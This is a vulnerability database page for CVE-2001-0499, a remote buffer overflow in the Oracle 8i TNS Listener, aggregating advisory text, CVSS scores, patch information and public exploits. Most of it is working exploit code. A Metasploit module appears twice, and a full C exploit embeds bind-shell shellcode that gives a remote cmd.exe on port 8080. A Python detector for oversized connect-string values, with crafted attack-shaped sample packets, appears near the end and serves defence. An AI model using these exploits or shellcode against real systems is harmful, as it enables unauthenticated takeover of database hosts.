CVE-2001-0499
CVSS 10.0
Published: 2001-07-21 00:00:00
Revised: 2008-09-10 15:08:13

[Original] Buffer overflow in Transparent Network Substrate (TNS) Listener in Oracle 8i 8.1.7 and earlier allows remote attackers to gain privileges via a long argument to the commands (1) STATUS, (2) PING, (3) SERVICES, (4) TRC_FILE, (5) SAVE_CONFIG, or (6) RELOAD.


[CNNVD] Oracle 8i TNS Listener Buffer Overflow Vulnerability (CNNVD-200107-140)

        Oracle 8i ships with a program, TNS Listener, that controls communication between remote database clients and the server.
        The TNS Listener implementation contains a buffer overflow; a remote attacker can exploit it to execute arbitrary code on the target host, and no authentication of the remote user is required.
        On Windows 2000/NT4 systems TNS Listener runs as the local administrator, so an attacker exploiting this flaw gains direct control of the host.
        On other operating systems TNS Listener runs under its own user account; exploitation gives the attacker local access to the target host, which can serve as a foothold for further attacks.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0499
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0499
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-140
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/620495
(UNKNOWN)  CERT-VN  VU#620495
http://www.cert.org/advisories/CA-2001-16.html
(UNKNOWN)  CERT  CA-2001-16
http://xforce.iss.net/xforce/xfdb/6758
(UNKNOWN)  XF  oracle-tns-listener-bo(6758)
http://www.securityfocus.com/bid/2941
(UNKNOWN)  BID  2941
http://www.nai.com/research/covert/advisories/050.asp
(UNKNOWN)  NAI  20010627 Vulnerability in Oracle 8i TNS Listener

- Vulnerability information

Oracle 8i TNS Listener Buffer Overflow Vulnerability
Critical  Boundary condition error
2001-07-21 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        Oracle
        ------
        Oracle has assigned bug number 1489683 to this issue and has released a patch, available from Oracle's worldwide support site:

        http://metalink.oracle.com

- Vulnerability information (16340)

Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow (EDBID:16340)
windows remote
2010-11-24 Verified
0 metasploit
##
# $Id: tns_arguments.rb 11122 2010-11-24 06:10:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Oracle 8i. When
				sending a specially crafted packet containing a overly long
				ARGUMENTS string to the TNS service, an attacker may be able
				to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11122 $',
			'References'     =>
				[
					[ 'CVE', '2001-0499' ],
					[ 'OSVDB', '9427'],
					[ 'BID', '2941' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 28 2001'))

		register_options([Opt::RPORT(1521)], self.class)
	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"

		pkt = tns_packet(version)

		sock.put(pkt)

		sock.get_once

		res = sock.get_once(-1, 1)

		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)

			sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"

			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
		

- Vulnerability information (20980)

Oracle 8i TNS Listener Buffer Overflow Vulnerability (EDBID:20980)
windows remote
2001-07-20 Verified
0 benjurry
source: http://www.securityfocus.com/bid/2941/info

Oracle 8i ships with a component called TNS Listener. TNS Listener is used to arbitrate communication between remote database clients/applications and the database server.

There exists a remotely exploitable buffer overflow in TNS Listener. Remote attackers can execute arbitrary code on affected hosts. This vulnerability does not require authentication to exploit.

On Windows 2000/NT4 systems, TNS Listener runs with 'LocalSystem' privileges. These are equivalent to administrative privileges, and any attacker able to exploit this vulnerability on such a system would gain control over it.

On Unix systems, Oracle processes such as the listener typically run as their own userid. Exploitation of this vulnerability on these systems would provide an attacker with local access to the victim host. It is significantly easier for attackers to compromise the entire system with local access.

Note: Versions 8.1.5, 8.1.6, and 8.1.7 are confirmed as being vulnerable. Previous versions are likely vulnerable as well. 


/*Oracle TNS SEH Exploit By Benjurry.

Oracle Remote Vulnerability discoveried by COVERT Labs
Code by benjurry,benjurry@xfocus.org
Welcome to http://www.xfocus.net & http://www.xfocus.org
Thank my friends:Batman,xq and Yuange.
Thank members of Xfocus.
This Exploit only test on Win2k Chinese +sp2 and Oracle 8.1.7

2001.7.20



*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#pragma comment (lib,"Ws2_32")

#define  FNENDLONG     0x08
#define  NOPCODE     0x90
#define  NOPLONG       0x20
#define  BUFFSIZE      0x1b00
#define  RETEIPADDRESS 0x0
#define  SHELLPORT     0x1f90  //shell port =8080
#define PORT 1521

void     shellcodefnlock();
void     shellcodefn();

void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char *argv[])
{
 char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"
       "CreateProcessA""\x0""CloseHandle""\x0"
       "PeekNamedPipe""\x0"
       "ReadFile""\x0""WriteFile""\x0"
       "wsock32.dll""\x0""socket""\x0"
       "bind""\x0""listen""\x0"
       "accept""\x0""send""\x0"
       "recv""\x0""ioctlsocket""\x0"
       "closesocket""\x0"
       "cmd.exe""\x0""exit\x0d\x0a""\x0"
       "strend";


   char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char cmd1[]="(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=status)(ARGUMENTS=3)(SERVICE=";
  char cmd2[]="1)(VERSION=1)))";
  char head[]="\x00\x59\x00\x00\x01\x00\x00\x00\x01\x36"
   "\x01\x2c\x00\x00\x08\x00\x7f\xff\x7f\x08\x00\x00\x00\x01"
   "\x00\x1f\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x34\xe6\x00\x00\x00\x01\x00\x00"
   "\x00\x00\x00\x00\x00\x00";
  char  eipwinnt[]="\x63\x0d\xfa\x7f";    // jmp ebx

char  JMPNEXTJMP[]="\xeb\x06\x90\x90";
  char  JMPSHELL[]="\xe9\x2a\xe7\xff\xff";

  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[0x1000];
   char    *shellcodefnadd,*chkespadd;
     unsigned  char temp;
  int OVERADD2=6346;
  char buffer2[BUFFSIZE];
  int ret;
 int packetlength;
 int cmdlength;
 int tt,shellcodeport,sendpacketlong;
 int i,j,k;
 int OVERADD=0;

 WSADATA WSAData;
 struct hostent          *ht;
 struct sockaddr_in      server;
 memset(buff,NOPCODE,BUFFSIZE);
 printf("Oracle Remote Vulnerability discoveried by COVERT Labs\n");
 printf("Code by benjurry,benjurry@xfocus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);
exit(1);
 }

 if((tt=WSAStartup(MAKEWORD(1,1), &WSAData)) != 0)
        {
                printf("WSAStartup failed.\n");
    tt=GetLastError();
                WSACleanup();
                exit(1);
        }
if((ht = gethostbyname(argv[1]))==0)
{
                printf("Unable to resolve host %s\n",argv[1]);
                exit(1);
        }
server.sin_port = htons(PORT);
server.sin_family=AF_INET;
server.sin_addr=*((struct in_addr *)ht->h_addr);
   if((ret = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
                printf("Unable to set up socket\n");
                exit(1);
        }

if((connect(ret, (struct sockaddr *) &server, sizeof(server))) == -1)
        {
                printf("Unable to connect\n");
                exit(1);
        }
        else
                printf("Connected.\n");









_asm{
        mov ESI,ESP
        cmp ESI,ESP

  }
 _chkesp();
  chkespadd=(char *)_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
          i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }

  shellcodefnadd=(char *)shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  for(k=0;k<=0x500;++k){
       if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }




   memset(buff,'\x42',BUFFSIZE);
   for(i=0;i<NOPLONG;i++)
    buff[i]='\x90';

 memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);

  shellcodefnadd=(char *)shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
    ++shellcodefnadd;
    k=*(int *)shellcodefnadd;
           shellcodefnadd+=k;
    shellcodefnadd+=4;
  }


  for(k=0;k<=0x1000;++k){
    if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }

  memcpy(shellcodebuff,shellcodefnadd,k);
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(i=0;i<0x400;++i){
    if(memcmp(str+i,"strend",6)==0) break;
  }
  memcpy(shellcodebuff+k,str,i);


  shellcodeport=SHELLPORT;
  shellcodeport=htons(shellcodeport);
  *(u_short *)(shellcodebuff+k)=shellcodeport;
  fprintf(stderr,"\n shellport %d",htons(shellcodeport));

  sendpacketlong=k+i;
  for(k=0;k<=0x200;++k){
         if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
  }

 for(i=0;i<sendpacketlong;++i){
      temp=shellcodebuff[i];
      if(temp<=0x10||temp=='0'){

       buff[OVERADD+NOPLONG+k]='0';
       ++k;
       temp+=0x40;
      }
      buff[OVERADD+NOPLONG+k]=temp;
      ++k;
}



   memcpy(buff+OVERADD2,JMPNEXTJMP,4);


// }
memcpy(buff+OVERADD2+4,eipwinnt,4);

 memcpy(buff+OVERADD2+8,JMPSHELL,5);

 for(i=OVERADD2+13;i<BUFFSIZE;i++)
  buff[i]='\x90';


 memset(buffer2,'\x90',sizeof(buffer2));
 memcpy(buffer2,head,sizeof(head)-1);
 memcpy(buffer2+sizeof(head)-1,cmd1,sizeof(cmd1)-1);
 memcpy(buffer2+sizeof(head)-1+sizeof(cmd1)-1,buff,sizeof(buff));
 memcpy(buffer2+sizeof(head)+sizeof(cmd1)+sizeof(buff)-3,cmd2,sizeof(cmd2)-1);


 packetlength=58+sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;
 cmdlength=sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;

 buffer2[0]=packetlength>> 8;
 buffer2[1]=packetlength & 0xff;
 buffer2[24]=cmdlength>>8;
 buffer2[25]=cmdlength& 0xff;





  if(send(ret, buffer2, packetlength, 0) == -1)
        {
                printf("Unable to send\n");
                exit(1);
        }
        else
        {
                printf("code sented...\n");

        }
Sleep(1000);
closesocket(ret);
return 0;


}

void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop

              jmp   next
getediadd:              pop   EDI
              push  EDI
              pop   ESI
              xor   ecx,ecx
              mov   cx,0x0fd0
looplock:            lodsb
        cmp   al,0x30
        jnz   sto
                     lodsb
        sub   al,0x40
sto:                 stosb
        loop  looplock
        jmp   shell
next:                call  getediadd

shell:         NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP

    }
}

/*bind cmd.exe  */
void shellcodefn()
{    char        Buff[0x800];
    int         *except[3];

    FARPROC     closesocketadd;
    FARPROC     ioctlsocketadd;
    FARPROC     recvadd;
           FARPROC     sendadd;
           FARPROC     acceptadd;
           FARPROC     listenadd;
           FARPROC     bindadd;
      FARPROC        socketadd;
//    FARPROC     WSAStartupadd;

    FARPROC        NOPNOP;

    FARPROC     WriteFileadd;
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    FARPROC     procloadlib;

    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;

    char        *stradd;
    int         imgbase,fnbase,k,l;
    HANDLE      libhandle;   //libwsock32;
           STARTUPINFO siinfo;
           SOCKET      listenFD,clientFD;
           struct      sockaddr_in server;
           int         iAddrSize = sizeof(server);
    int         lBytesRead;
    u_short     shellcodeport;

           PROCESS_INFORMATION ProcessInformation;
           HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
           SECURITY_ATTRIBUTES sa;
    _asm {     jmp    nextcall
         getstradd:   pop    stradd
                      lea    EDI,except
                    mov    eax,dword ptr FS:[0]
        mov    dword ptr [edi+0x08],eax
        mov    dword ptr FS:[0],EDI

    }
       except[0]=0xffffffff;
       except[1]=stradd-0x07;

       imgbase=0x77e00000;
       _asm{
          call getexceptretadd
       }
for(;imgbase<0xbffa0000,procgetadd==0;){
     imgbase+=0x10000;
     if(imgbase==0x78000000) imgbase=0xbff00000;
     if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
    fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
    k=*(int *)(fnbase+0xc)+imgbase;
    if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
        libhandle=imgbase;
       k=imgbase+*(int *)(fnbase+0x20);
       for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
          if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
             k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
             k+=*(int *)(fnbase+0x10)-1;
             k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
             procgetadd=k+imgbase;
             break;
           }
        }
    }
        }
    }


  _asm{
           lea edi,except
           mov eax,dword ptr [edi+0x08]
    mov dword ptr fs:[0],eax
   }


   if(procgetadd==0) goto  die ;

   shellcodeport=*(u_short *)stradd;
   stradd+=2;
   for(k=1;k<17;++k) {
    if(k==8) libhandle=procloadlib(stradd);
    else     apifnadd[k]=procgetadd(libhandle,stradd);
    for(;;++stradd){
         if(*(stradd)==0&&*(stradd+1)!=0) break;
    }
    ++stradd;
   }

//           WSAStartupadd(MAKEWORD(1, 1), &wsaData);

            listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            server.sin_family = AF_INET;
            server.sin_port =shellcodeport;
            //SHELLPORT;
            server.sin_addr.s_addr=0;
        k=1;
     while(k!=0){
          k=bindadd(listenFD,&server,sizeof(server));
                 server.sin_port+=0x100;
          if(server.sin_port<0x100) ++server.sin_port;
            }
     listenadd(listenFD,10);

while(1){
            sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;

            CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);

// ZeroMemory(&siinfo,sizeof(siinfo));
            _asm{
                 lea EDI,siinfo
                xor eax,eax
                mov ecx,0x11
                repnz stosd
            }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;

//   k=0;
//    while(k==0)
//    {
    k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
//        stradd+=8;
//    }
    PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);

    clientFD=acceptadd(listenFD,&server,&iAddrSize);

    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
        if(lBytesRead>0) {
              ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
              if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0);
              else sendadd(clientFD,stradd,8,0);
        }
        else {
            lBytesRead=recvadd(clientFD,Buff,1024,0);

            if(lBytesRead<=0){
//                    CloseHandleadd(ProcessInformation.hProcess);  //.dwProcessId);
                   lBytesRead=6;
                   WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0);
                   closesocketadd(clientFD);
                   break;
            }
            else{
                   sendadd(clientFD,Buff,lBytesRead,0);

                   WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
            }
        }
    }
}




      die: goto die  ;
        _asm{

getexceptretadd:   pop  eax
            push eax
            mov  edi,dword ptr [stradd]
            mov dword ptr [edi-0x0e],eax
            ret
errprogram:        mov eax,dword ptr [esp+0x0c]
            add eax,0xb8
            mov dword ptr [eax],0x11223344  //stradd-0xe
            xor eax,eax        //2
            ret        //1
execptprogram:     jmp errprogram    //2 bytes     stradd-7
nextcall:          call getstradd    //5 bytes
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
    }
}


void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
   int i,k;
   unsigned char temp;
   char *calladd;

   for(i=0;i<len;++i){
       temp=shellbuff[i];
       if(temp==0xe8){
             k=*(int *)(shellbuff+i+1);
        calladd=fnadd;
      calladd+=k;
      calladd+=i;
      calladd+=5;
      if(calladd==chkesp){
              shellbuff[i]=0x90;
              shellbuff[i+1]=0x43;   // inc ebx
        shellbuff[i+2]=0x4b;    // dec ebx
        shellbuff[i+3]=0x43;
        shellbuff[i+4]=0x4b;
       }
        }
   }
}
		

- Vulnerability information (F83067)

Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow. (PacketStormID:F83067)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2001-0499

This Metasploit module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet containing an overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.',
			'Description'    => %q{
				This module exploits a stack overflow in Oracle 8i. When
				sending a specially crafted packet containing a overly long
				ARGUMENTS string to the TNS service, an attacker may be able 
				to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,			
			'Version'        => '$Revision: 6637 $',
			'References'     => 
				[ 
					[ 'CVE', '2001-0499' ],
					[ 'OSVDB', '9427'],
					[ 'BID', '2941' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 28 2001'))

			register_options([Opt::RPORT(1521)], self.class)

	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
	
		pkt = tns_packet(version)

		sock.put(pkt)
		
		sock.get_once

		res = sock.get_once(-1, 1)
		
		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)

			sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"
			
			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
    

- Vulnerability information

9427
Oracle TNS Listener Multiple Command Argument Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

A buffer overflow exists in Oracle. The TNS Listener fails to validate the arguments passed to the STATUS, PING, SERVICES, TRC_FILE, SAVE_CONFIG and RELOAD commands, resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution, resulting in a loss of integrity.
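The descriptions above (the CNNVD/BID text and this OSVDB entry) all come down to the same observable: a listener-control request whose command carries one abnormally long value. The two exploits quoted on this page even disagree on which field carries it (the Metasploit module uses ARGUMENTS, the xfocus C exploit puts the long string in SERVICE), so a network-side check should measure every leaf value in the connect string rather than one key. The following Python is an added example, not code from this page or from any of the projects quoted on it. It parses only the TNS CONNECT header fields the exploits themselves fill in (bytes 0-1 total length, byte 4 packet type, bytes 24-25 connect-string length, bytes 26-27 connect-string offset), extracts the connect string and flags any leaf value over a threshold. The 512-byte limit, the function names and the sample packets are assumptions constructed for this example.

```python
"""Flag oversized values in Oracle TNS CONNECT packets (added example, not page code)."""
import re
import struct
from typing import Dict, List, Optional, Tuple

# TNS CONNECT header fields, as filled in by the exploits quoted on this page:
#   bytes 0-1   total packet length, big-endian
#   byte  4     packet type (1 = CONNECT)
#   bytes 24-25 length of the connect string
#   bytes 26-27 offset of the connect string from the packet start (0x3a = 58 here)
TNS_CONNECT = 1
HEADER_LEN = 58

# Assumed threshold for this example: legitimate listener-control values are a few
# dozen bytes, while the public exploits send several kilobytes in a single value.
MAX_VALUE_LEN = 512

# "(KEY=" at any nesting depth; the value runs from here to the matching ')'.
KEY_RE = re.compile(rb"\(([A-Za-z_][A-Za-z0-9_]*)=")


def build_connect_packet(connect_data: bytes) -> bytes:
    """Wrap a connect string in a minimal CONNECT header (used to construct samples)."""
    header = bytearray(HEADER_LEN)
    header[4] = TNS_CONNECT
    struct.pack_into(">H", header, 0, HEADER_LEN + len(connect_data))
    struct.pack_into(">H", header, 24, len(connect_data))
    struct.pack_into(">H", header, 26, HEADER_LEN)
    return bytes(header) + connect_data


def parse_connect_data(packet: bytes) -> Optional[bytes]:
    """Return the connect string, or None if the packet is not a consistent CONNECT
    packet (wrong type, shorter than its header, or length/offset pointing outside it)."""
    if len(packet) < HEADER_LEN or packet[4] != TNS_CONNECT:
        return None
    (pkt_len,) = struct.unpack_from(">H", packet, 0)
    (data_len,) = struct.unpack_from(">H", packet, 24)
    (data_off,) = struct.unpack_from(">H", packet, 26)
    if pkt_len > len(packet) or data_off + data_len > pkt_len:
        return None
    return packet[data_off:data_off + data_len]


def leaf_value_lengths(data: bytes) -> List[Tuple[str, int]]:
    """(KEY, length) for every leaf value in the connect string. Container values such
    as CONNECT_DATA=(...) are skipped; their leaves are visited on their own. A value
    whose parentheses never balance (how an overflow payload usually looks) is
    measured up to the end of the data."""
    out = []
    for m in KEY_RE.finditer(data):
        pos = m.end()
        if data[pos:pos + 1] == b"(":
            continue  # nested container
        depth, i = 1, pos
        while i < len(data) and depth > 0:
            if data[i] == 0x28:      # '('
                depth += 1
            elif data[i] == 0x29:    # ')'
                depth -= 1
            i += 1
        end = i - 1 if depth == 0 else len(data)
        out.append((m.group(1).decode("ascii").upper(), end - pos))
    return out


def inspect_packet(packet: bytes) -> Dict[str, object]:
    """Classify one packet: 'malformed', 'suspicious' (a leaf value over the limit) or 'ok'."""
    data = parse_connect_data(packet)
    if data is None:
        return {"verdict": "malformed", "command": None, "longest_key": None, "longest_len": 0}
    m = re.search(rb"\(COMMAND=([A-Za-z_]+)\)", data, re.IGNORECASE)
    command = m.group(1).decode("ascii").upper() if m else None
    key, longest = max(leaf_value_lengths(data), key=lambda kv: kv[1], default=(None, 0))
    verdict = "suspicious" if longest > MAX_VALUE_LEN else "ok"
    return {"verdict": verdict, "command": command, "longest_key": key, "longest_len": longest}


# Constructed sample traffic for this example (not captured from any real host).
BENIGN_CONNECT_DATA = b"(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=135290880))"
_bad_length = bytearray(build_connect_packet(BENIGN_CONNECT_DATA))
struct.pack_into(">H", _bad_length, 24, 0xFFFF)  # declared connect-string length runs past the packet

SAMPLE_PACKETS = {
    "benign_status": build_connect_packet(BENIGN_CONNECT_DATA),
    # shape of the Metasploit request: one 6383-byte ARGUMENTS value
    "long_arguments": build_connect_packet(
        b"(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=" + b"A" * 6383 + b"))"),
    # shape of the C exploit's request: the long value sits in SERVICE and never closes
    "long_service_unterminated": build_connect_packet(
        b"(DESCRIPTION=(CONNECT_DATA=(COMMAND=status)(ARGUMENTS=3)(SERVICE=" + b"\x90" * 700),
    "truncated": build_connect_packet(BENIGN_CONNECT_DATA)[:40],
    "bad_length": bytes(_bad_length),
}

if __name__ == "__main__":
    for name, pkt in SAMPLE_PACKETS.items():
        print(f"{name:28s} {inspect_packet(pkt)}")
```

The header consistency check matters as much as the length check: a sensor that trusts the declared length and offset fields can be steered to read outside the packet, so anything whose fields disagree with the bytes actually on the wire is reported as malformed rather than parsed further.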

- Timeline

2001-06-27 Unknown
2001-07-20 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete